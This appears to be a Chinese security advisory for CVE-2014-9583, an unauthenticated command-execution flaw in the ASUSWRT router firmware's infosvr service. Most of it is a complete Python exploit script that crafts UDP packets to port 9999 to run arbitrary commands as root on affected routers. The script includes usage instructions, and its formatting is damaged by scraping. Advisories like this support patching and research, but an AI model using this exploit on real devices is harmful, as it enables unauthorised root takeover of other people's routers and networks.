ASUSWRT 3.0.0.4.376_1071 LAN后门命令执行漏洞

发布日期：2015-01-08
更新日期：2015-01-12受影响系统：
Asus ASUSWRT 3.0.0.4.376_1071
Asus ASUSWRT 3.0.0.376.2524-g0013f52
描述：
CVE（CAN） ID: CVE-2014-9583 ASUSWRT是ASUS路由器固件。ASUS WRT 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52版本中，infosvr的common.c没有正确检查请求的MAC地址，这可使远程攻击者通过向UDP端口9999，发送NET_CMD_ID_MANU_CMD数据包，利用此漏洞绕过身份验证并执行任意命令。受影响固件版本用在RT-AC66U, RT-N66U等其他路由器中。<*来源：Friedrich Postelstorfer
*>测试方法：警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
#！/usr/bin/env python3 # Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution
# Date: 2014-10-11
# Vendor Homepage: http://www.asus.com/
# Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip
# Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip
# Tested Version: 3.0.0.4.376_1071-g8696125
# Tested Device: RT-N66U # Description:
# A service called "infosvr" listens on port 9999 on the LAN bridge.
# Normally this service is used for device discovery using the
# "ASUS Wireless Router Device Discovery Utility", but this service contains a
# feature that allows an unauthenticated user on the LAN to execute commands
# <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr.
# "iboxcom.h" is in asuswrt/release/src/router/shared.
#
# Affected devices may also include wireless repeaters and other networking
# products, especially the ones which have "Device Discovery" in their features
# list.
#
# Using broadcast address as the IP address should work and execute the command
# on all devices in the network segment, but only receiving one response is
# supported by this script. import sys, os, socket, struct
PORT = 9999 if len（sys.argv） < 3:
print（"Usage: " + sys.argv[0] + " <ip> <command>", file=sys.stderr）
sys.exit（1）
ip = sys.argv[1]
cmd = sys.argv[2] enccmd = cmd.encode（） if len（enccmd） > 237:
# Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server.
print（"Values over 237 will give rise to undefined behaviour.", file=sys.stderr）
sys.exit（1） sock = socket.socket（socket.AF_INET, socket.SOCK_DGRAM）
sock.bind（（"0.0.0.0", PORT））
sock.settimeout（2） # Request consists of following things
# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO
# PacketType [byte] ; NET_PACKET_TYPE_CMD
# OpCode [word] ; NET_CMD_ID_MANU_CMD
# Info [dword] ; Comment: "Or Transaction ID"
# MacAddress [byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp
# Password [byte[32]] ; Not checked at all
# Length [word]
# Command [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable packet = （b"x0Cx15x33x00" + os.urandom（4） + （b"x00" * 38） + struct.pack（"<H", len（enccmd）） + enccmd）.ljust（512, b"x00"） sock.sendto（packet, （ip, PORT））
# Response consists of following things
# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO
# PacketType [byte] ; NET_PACKET_TYPE_RES
# OpCode [word] ; NET_CMD_ID_MANU_CMD
# Info [dword] ; Equal to Info of request
# MacAddress [byte[6]] ; Filled in for us
# Length [word]
# Result [byte[420]] ; Actually returns that amount while True:
data, addr = sock.recvfrom（512） if len（data） == 512 and data[1] == 22:
break length = struct.unpack（"<H", data[14:16]）[0]
s = slice（16, 16+length）
sys.stdout.buffer.write（data[s]） sock.close（）建议：
厂商补丁：Asus
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip